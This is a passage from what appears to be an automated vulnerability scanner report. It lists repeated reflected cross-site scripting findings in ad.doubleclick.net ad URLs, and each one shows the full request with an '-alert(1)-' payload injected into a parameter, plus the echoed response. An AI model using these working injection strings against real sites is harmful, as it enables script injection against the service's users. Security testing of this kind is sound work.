Expires: Sun, 13 Feb 2011 14:32:23 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=c34c1"-alert(1)-"ffec0e07b85http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979%3B4307-300/250%3B40646325/40664112/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://slim-fast.co
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e781'-alert(1)-'041f920cb05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!4e781'-alert(1)-'041f920cb05&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:25 GMT
Expires: Sun, 13 Feb 2011 14:31:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6817

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!4e781'-alert(1)-'041f920cb05&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B236295977%3B0-0%3B0%3B59899979
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf748"-alert(1)-"5796586211 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.3;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!cf748"-alert(1)-"5796586211&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=;ord=539492587? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:26:21 GMT
Expires: Sun, 13 Feb 2011 14:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6813

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0.2mdn.net/468024/SF_MealBar_300x250_bkup.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/112000000000041428.1?!cf748"-alert(1)-"5796586211&&PID=8352251&UIT=G&TargetID=31057270&AN=539492587&PG=FTBHI3&ASID=bce831e08d424752959dcd3fff3fd9c4&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/p%3B236295977%3B0-0%3B0%3B59899979
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d43"-alert(1)-"e8d2d079361 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252c2d43"-alert(1)-"e8d2d079361&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:15 GMT
Expires: Sun, 13 Feb 2011 14:32:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
t/468024/SF_6xaDay_728x90_bkup.jpg";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252c2d43"-alert(1)-"e8d2d079361&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66971'-alert(1)-'187f15fe89 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=835225266971'-alert(1)-'187f15fe89&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:19 GMT
Expires: Sun, 13 Feb 2011 14:32:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6791

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=835225266971'-alert(1)-'187f15fe89&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86efc"-alert(1)-"35eb9b8fbe9 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=126093116086efc"-alert(1)-"35eb9b8fbe9&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:41 GMT
Expires: Sun, 13 Feb 2011 14:32:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ar minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=126093116086efc"-alert(1)-"35eb9b8fbe9&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B40646324/40664111/1%3B%3B%7Eokv%3
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98c7'-alert(1)-'7568314763a was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160d98c7'-alert(1)-'7568314763a&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:45 GMT
Expires: Sun, 13 Feb 2011 14:32:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6858

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160d98c7'-alert(1)-'7568314763a&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B40601181/40618968/1%3B%3B%7Eokv%3
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f90f"-alert(1)-"02e07cbda18 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e06f90f"-alert(1)-"02e07cbda18&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:58 GMT
Expires: Sun, 13 Feb 2011 14:32:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e06f90f"-alert(1)-"02e07cbda18&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B40646324/40664111/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7610c'-alert(1)-'3203b8a8be2 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e07610c'-alert(1)-'3203b8a8be2&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:28:03 GMT
Expires: Sun, 13 Feb 2011 14:33:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6858

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e07610c'-alert(1)-'3203b8a8be2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B40601181/40618968/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72aed"-alert(1)-"2b3cf22b0e7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI772aed"-alert(1)-"2b3cf22b0e7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:49 GMT
Expires: Sun, 13 Feb 2011 14:32:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI772aed"-alert(1)-"2b3cf22b0e7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B40646324/40664111/1%3B%3B%7Eokv%3D%3Bpc%3D%
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e86'-alert(1)-'afae55c080 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI710e86'-alert(1)-'afae55c080&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:54 GMT
Expires: Sun, 13 Feb 2011 14:32:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6854

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI710e86'-alert(1)-'afae55c080&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B40601181/40618968/1%3B%3B%7Eokv%3D%3Bpc%3D%
...[SNIP]...

3.25. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e91"-alert(1)-"322f1bd07ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=3105726959e91"-alert(1)-"322f1bd07ad&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:32 GMT
Expires: Sun, 13 Feb 2011 14:32:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0_bkup.jpg";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=3105726959e91"-alert(1)-"322f1bd07ad&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B40646324/40664111/1
...[SNIP]...

3.26. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcca2'-alert(1)-'45c41a84c6f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269dcca2'-alert(1)-'45c41a84c6f&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:37 GMT
Expires: Sun, 13 Feb 2011 14:32:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6858

